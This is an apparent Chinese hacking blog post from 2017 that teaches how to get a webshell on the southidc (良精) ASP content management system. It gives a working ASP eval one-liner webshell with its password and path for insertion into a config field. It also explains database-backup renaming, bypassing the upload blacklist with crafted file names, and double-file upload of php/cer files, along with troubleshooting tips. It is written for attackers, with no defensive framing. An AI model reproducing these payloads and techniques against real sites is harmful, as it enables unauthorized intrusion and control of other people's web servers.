解决良精科技(southidc)被破坏的情况拿shell

请在后台-主题设置-文章页设置-添加左边栏模块

不知道大家有没有遇到这种情况,原本很好拿的南方科技但是很多平常可以利用的方式都不可以使用了。

那么我们来总结一下常见拿南方科技的方式。

前台得到账户密码这里不多做讲诉,不过有一款类似的cms倒是存在cookies欺骗,因为这款cms使用的是asp session时钟是30min

也就是说我们一般遇到了最多也只能在30分钟里面进行操作。

访问后台页面如果存在session.asp,那么你就会得到一个session然后你就可以操作你想操作的了。

那么我们继续我们要说的后台常见拿shell的方式。

1> 数据库插入拿shell

打开网站配置—-随便找一个字符长度没有限制的地方插入你的回执代码。

因为asp需要用<% %>来闭合,而且一个标记和另外一个标记之间通常会用双引号和单引号来闭合

所以这里我们插入一句话代码在网站地址这里因为这里的长度通常不会太短。。 当然一般也是可以修改源码来获得更加长的字符长度。。。

一句话内容:

“%><%a=request(“L0s4r”)%><%eval a%><%’

密码:L0s4r

连接地址inc/config,asp

2>数据库备份拿shell

通常情况来讲数据库被分拿shell会需要fso权限而且还要开放了才可以,这里我推荐大家使用抓包工具修改路径和后缀数据。

3>编辑器拿shell

编辑器拿shell,方式很简单了就是类似eweb拿shell一样,打开southidceditor/admin_style.asp

然后修改样式数据,因为这个编辑器采用的是过滤和黑名单的方式来实现上传监控。所以我们只需要构造一下上传的文件名就可以了

比如aaspsp,具体这里吧多做叙述。

4>双文件上传拿shell

其实双文件上传就是修改表单数据造成的,其实因为这款系统没有过滤php和cer可以很简单的实现上传。php和cer文件。具体看网站配置。

下面说一下可能会遇到的问题

1 为什么我上传了文件打开却不存在

这里检查一下你的网站空间是否具有写入权限或者是否虚拟主机是否已经满了,检查方式就是打开文件管理,看能否删除文件。

如果是满了删除即可,如果没有写入权限通常是放弃。

2 我明明有写入权限但是上传文件为什么老是打开失败。提示不能解析

这里通常是因为服务商安装了安全软件导致的。最简单的方式就是换一个上传目录,具体参见网站配置

3 只有编辑器上传,没有表单上传。我上传的文件目录又不能建立,偏偏我就这么一个可以操作的和写入的地方我该怎么做。。

这里比较简单的方式就是利用数据库备份来实现文件目录的创建,修改提交数据即可。

先说到这里,有时间再继续更新!

不懂的话就留言问我吧!

标签:

未经允许不得转载:作者:tigh, 转载或复制请以 超链接形式 并注明出处 猫雅博客
原文地址:《解决良精科技(southidc)被破坏的情况拿shell》 发布于2017-03-06

分享到:
赞(0) 生成海报

评论 抢沙发

评论前必须登录!

  注册



长按图片转发给朋友

博客进行重整
由于现实繁忙博客已几个月没管理,最近由于疫情在家所以打算重整博客,在此也希望大家注意身体不要去人多的地方,不要感染了病毒了。
切换注册

登录

忘记密码 ?

切换登录

注册